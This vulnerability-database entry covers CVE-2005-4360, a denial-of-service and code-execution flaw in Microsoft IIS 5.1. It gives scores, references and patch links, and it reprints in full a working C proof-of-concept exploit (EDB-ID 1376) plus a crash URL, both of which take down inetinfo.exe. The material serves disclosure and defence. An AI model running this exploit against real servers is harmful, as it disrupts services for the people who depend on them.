CVE-2005-4360
CVSS 7.8
Published: 2005-12-19 20:03:00
Revised: 2011-10-03 00:00:00

[Original] The URL parser in Microsoft Internet Information Services (IIS) 5.1 on Windows XP Professional SP2 allows remote attackers to execute arbitrary code via multiple requests to ".dll" followed by arguments such as "~0" through "~9", which causes ntdll.dll to produce a return value that is not correctly handled by IIS, as demonstrated using "/_vti_bin/.dll/*/~0". NOTE: the consequence was originally believed to be only a denial of service (application crash and reboot).


[CNNVD] Microsoft IIS 5.1 Remote Buffer Overflow Vulnerability (CNNVD-200512-423)

        Microsoft IIS is the network information server bundled with Microsoft Windows; it includes an HTTP service.
        Microsoft IIS mishandles certain malformed HTTP requests; a remote attacker can exploit this to mount a denial-of-service attack against the server.
        A remote attacker can use a tool as simple as a web browser to send specially crafted anonymous HTTP requests that crash the IIS service process inetinfo.exe. The vulnerability is exposed only when a folder's "Execute Permissions" are set to "Scripts and Executables"; affected virtual folders include "/_vti_bin". Submitting such malicious requests may additionally trigger a buffer overflow and allow arbitrary code execution on the target system.

- CVSS (base score)

CVSS score: 7.8 [HIGH] (vector AV:N/AC:L/Au:N/C:N/I:N/A:C)
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: NONE [no impact on system integrity]
Availability impact: COMPLETE [system availability can be completely lost; the service process crashes]
Access complexity: LOW [no specialized access conditions are required]
Access vector: NETWORK [the attacker needs neither intranet nor local access]
Authentication: NONE [no authentication is required for exploitation]

- CWE (weakness category)

CWE-20 [Improper Input Validation]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

oval:org.mitre.oval:def:1703  IIS Memory Request Vulnerability
oval:gov.nist.fdcc.patch:def:450  MS07-041: Vulnerability in Microsoft Internet Information Services Could Allow Remote Code Execution (939373)
oval:gov.nist.USGCB.patch:def:450  MS07-041: Vulnerability in Microsoft Internet Information Services Could Allow Remote Code Execution (939373)
*OVAL describes in detail how to detect this vulnerability; the referenced OVAL definitions give further technical details on detection.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4360
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4360
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-423
(official data source) CNNVD

- Other links and resources

http://www.us-cert.gov/cas/techalerts/TA07-191A.html
(UNKNOWN)  CERT  TA07-191A
http://www.vupen.com/english/advisories/2005/2963
(VENDOR_ADVISORY)  VUPEN  ADV-2005-2963
http://www.securityfocus.com/bid/15921
(UNKNOWN)  BID  15921
http://www.securityfocus.com/archive/1/archive/1/419707/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20051216 Microsoft IIS Remote Denial of Service (DoS) .DLL Url exploit
http://www.osvdb.org/21805
(UNKNOWN)  OSVDB  21805
http://www.microsoft.com/technet/security/Bulletin/ms07-041.mspx
(UNKNOWN)  MS  MS07-041
http://securitytracker.com/alerts/2005/Dec/1015376.html
(UNKNOWN)  SECTRACK  1015376
http://securityreason.com/securityalert/271
(UNKNOWN)  SREASON  271
http://secunia.com/advisories/18106
(VENDOR_ADVISORY)  SECUNIA  18106
http://ingehenriksen.blogspot.com/2005/12/microsoft-iis-remote-dos-dll-url.html
(VENDOR_ADVISORY)  MISC  http://ingehenriksen.blogspot.com/2005/12/microsoft-iis-remote-dos-dll-url.html
http://archive.cert.uni-stuttgart.de/bugtraq/2007/07/msg00254.html
(UNKNOWN)  HP  SSRT071446

- Vulnerability information

Microsoft IIS 5.1 Remote Buffer Overflow Vulnerability
High severity   Input validation
Published: 2005-12-19 00:00:00   Updated: 2005-12-21 00:00:00
Remote

- Advisories and patches

        The vendor has released a patch for this security issue. Patch links:
        http://www.microsoft.com/technet/security/Bulletin/ms07-041.mspx?pf=true
        http://www.microsoft.com/downloads/details.aspx?FamilyId=fccbfe90-f838-47df-8310-352e2fb47132

- Vulnerability information (1376)

MS Windows IIS Malformed HTTP Request Denial of Service Exploit (c) (EDB-ID: 1376)
Platform: windows   Type: dos
Date: 2005-12-19   Verified
Port: 0   Author: Kozan
/*****************************************************************

Microsoft IIS 5.1 Remote D.o.S Exploit by Kozan

Application: Microsoft IIS (Internet Information Server)
Vendor: Microsoft - http://www.microsoft.com/

Discovered by: Inge Henriksen
Exploit Coded by: Kozan
Credits to ATmaCA,  Inge Henriksen
Web: www.spyinstructors.com
Mail: kozan@spyinstructors.com


Vulnerable:
Microsoft® Internet Information Server® V5.1

Not vulnerable:
Microsoft® Internet Information Server® V5.0
Microsoft® Internet Information Server® V6.0


Only folders with Execute Permissions set to 'Scripts & Executables'
are affected, such as the '_vti_bin' directory.

inetinfo.exe will crash once the exploit has finished successfully.

Usage: iis51dos.exe [Target Url or IP]

*****************************************************************/

#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")


/* Build the crashing request. The buffer is static so that the pointer
   returned to the caller stays valid after this function returns. */
char *HttpHeader(char *pszHost)
{
       static char szHeader[1000];

       wsprintf(       szHeader,       "POST /_vti_bin/.dll/*/~0 HTTP/1.1\r\n"
                                                       "Content-Type: application/x-www-form-urlencoded\r\n"
                                                       "Host: %s\r\n"
                                                       "Content-Length: 0\r\n\r\n"
                                               ,       pszHost
                       );

       return szHeader;
}


int main(int argc, char *argv[])
{
       fprintf(stdout, "\n\nMicrosoft IIS 5.1 Remote D.o.S Exploit by Kozan\n"
                                       "Bug Discovered by: Inge Henriksen\n"
                                       "Exploit Coded by: Kozan\n"
                                       "Credits to ATmaCA, Inge Henriksen\n"
                                       "www.spyinstructors.com - kozan@spyinstructors.com\n\n"
                       );

       if( argc != 2 )
       {
               fprintf(stderr, "\n\nUsage:\t%s [WebSiteUrl]\n\n", argv[0]);
               return -1;
       }

       WSADATA wsaData;
       struct hostent *pTarget;
       struct sockaddr_in addr;
       SOCKET sock;

       char szHeader[1000], szWebUrl[1000];

       /* bounded copy of the target host, then build the request for it */
       lstrcpyn(szWebUrl, argv[1], sizeof(szWebUrl));
       lstrcpy(szHeader, HttpHeader(szWebUrl));

       /* WSAStartup returns 0 on success and a (positive) WSA error code otherwise */
       if( WSAStartup(0x0101,&wsaData) != 0 )
       {
               fprintf(stderr, "Winsock error!\n");
               return -1;
       }

       sock = socket(AF_INET,SOCK_STREAM,0);

       if( sock == INVALID_SOCKET )
       {
               fprintf(stderr, "Socket error!\n");
               WSACleanup();
               return -1;
       }

       if( (pTarget = gethostbyname(szWebUrl)) == NULL )
       {
               fprintf(stderr, "Address resolve error!\n");
               return -1;
       }

       memcpy(&addr.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
       addr.sin_family = AF_INET;
       addr.sin_port = htons(80);
       memset(&(addr.sin_zero), '\0', 8);

       fprintf(stdout, "Please wait while connecting...\n");

       if( connect( sock, (struct sockaddr*)&addr, sizeof(struct sockaddr) ) == -1 )
       {
               fprintf(stderr, "Connection failed!\n");
               closesocket(sock);
               return -1;
       }

       fprintf(stdout, "Connected.\n\n");

       fprintf(stdout, "Please wait while sending DoS request headers...\n\n");

       for( int i=0; i<4; i++ )
       {
               fprintf(stdout, "Sending %d. request...\n", i+1);

               if( send(sock, szHeader, lstrlen(szHeader),0) == -1 )
               {
                       fprintf(stderr, "%d. DoS request header could not sent!\n", i+1);
                       closesocket(sock);
                       return -1;
               }

               fprintf(stdout, "%d. request sent.\n\n", i+1);
       }

       fprintf(stdout, "Operation completed...\n");
       closesocket(sock);
       WSACleanup();


       return 0;
}

// milw0rm.com [2005-12-19]

- Vulnerability information

21805
Microsoft IIS Crafted URL Remote DoS
Remote / Network Access   Denial of Service
Loss of Availability
Exploit Public

- Vulnerability description

Microsoft Internet Information Services (IIS) contains a flaw that may allow a remote denial of service. The issue is triggered when a crafted URL pointing to a folder with execute permission set to Scripts and Executables is sent, and will result in loss of availability for the service.

- Timeline

2005-12-16 Unknown
2005-12-16 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue. (This is the OSVDB entry as originally recorded; Microsoft later fixed the issue in MS07-041, linked above.)
- Vulnerability information

Microsoft Internet Information Server 5.1 DLL Request Remote Code Execution Vulnerability
Class: Boundary Condition Error   BID: 15921
Remote: Yes   Local: No
Published: 2005-12-17 12:00:00   Updated: 2007-07-13 03:27:00
Discovered by Inge Henriksen <nge.henriksen@booleansoft.com>. Jonathan Afek and Adi Sharabani of Watchfire supplied more information and assisted Microsoft with this issue.

- Affected program versions

Microsoft IIS 5.1
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
+ Microsoft Windows XP 64-bit Edition SP1
+ Microsoft Windows XP 64-bit Edition
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
+ Microsoft Windows XP Professional SP1
+ Microsoft Windows XP Professional
Avaya Messaging Application Server MM 3.1
Avaya Messaging Application Server MM 3.0
Avaya Messaging Application Server MM 2.0

- Vulnerability discussion

Microsoft IIS is prone to a remote code-execution vulnerability because the application fails to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer.

Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the vulnerable application, which may lead to the complete compromise of affected computers.

This issue affects Microsoft IIS 5.1 running on Windows XP SP2.

Note: this issue was previously reported as a denial-of-service vulnerability. New information from the vendor states that code execution is possible.

- Exploitation

To demonstrate this issue, the following request will crash the application if issued a number of times (four requests will do the trick, according to the author):

http://www.example.com/_vti_bin/.dll/*\~0

The proof-of-concept exploit reproduced above (EDB-ID 1376) also demonstrates this issue by crashing the application.

- Solution

The vendor released an advisory along with fixes to address this issue. Please see the referenced advisory for more information.